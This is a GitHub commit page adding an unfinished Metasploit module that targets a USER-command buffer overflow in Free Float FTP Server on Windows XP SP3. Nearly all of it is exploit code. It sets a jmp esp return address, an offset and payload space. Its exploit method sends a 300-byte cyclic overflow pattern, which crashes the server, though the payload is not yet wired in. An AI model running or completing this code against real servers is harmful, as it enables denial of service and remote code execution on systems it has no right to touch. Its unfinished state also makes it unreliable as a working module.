Skip to content

Commit bd11b4f

Browse files
committed
working on freefloatftp_user.rb
1 parent bbff20f commit bd11b4f

File tree

1 file changed

+64
-0
lines changed

1 file changed

+64
-0
lines changed
Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# Framework web site for more information on licensing and terms of use.
5+
# http://metasploit.com/framework/
6+
##
7+
8+
require 'msf/core'
9+
10+
class Metasploit4 < Msf::Exploit::Remote
11+
Rank = LowRanking
12+
13+
include Msf::Exploit::Remote::Ftp
14+
15+
def initialize(info = {})
16+
super(update_info(info,
17+
'Name' => 'Free Float FTP Server USER Command Buffer Overflow',
18+
'Description' => %q{
19+
},
20+
'Platform' => 'win',
21+
'Author' =>
22+
[
23+
'D35m0nd142', # Original exploit
24+
'Doug Prostko <dougtko[at]gmail.com>' # MSF module
25+
],
26+
'License' => MSF_LICENSE,
27+
'References' =>
28+
[
29+
[ 'OSVDB', '69621'],
30+
[ 'EDB', '23243']
31+
],
32+
'Privileged' => false,
33+
'Payload' =>
34+
{
35+
'Space' => 500,
36+
#'DisableNops' => true,
37+
#'BadChars' => "\x00\x0a\x0d\x20\x5c",
38+
#'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
39+
},
40+
'Targets' =>
41+
[
42+
[ 'Windows XP SP3',
43+
{
44+
'Ret' => 0x7E379353, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
45+
'Offset' => 228
46+
}
47+
],
48+
],
49+
'DefaultTarget' => 0,
50+
'DisclosureDate' => 'Jun 12 2012'))
51+
register_options(
52+
[
53+
#OptAddress.new('SOURCEIP', [false, 'The local client address'])
54+
], self.class)
55+
end
56+
57+
def exploit
58+
connect
59+
buf = pattern_create(300)
60+
send_cmd( ['USER ', buf], false )
61+
disconnect
62+
end
63+
64+
end

0 commit comments

Comments
 (0)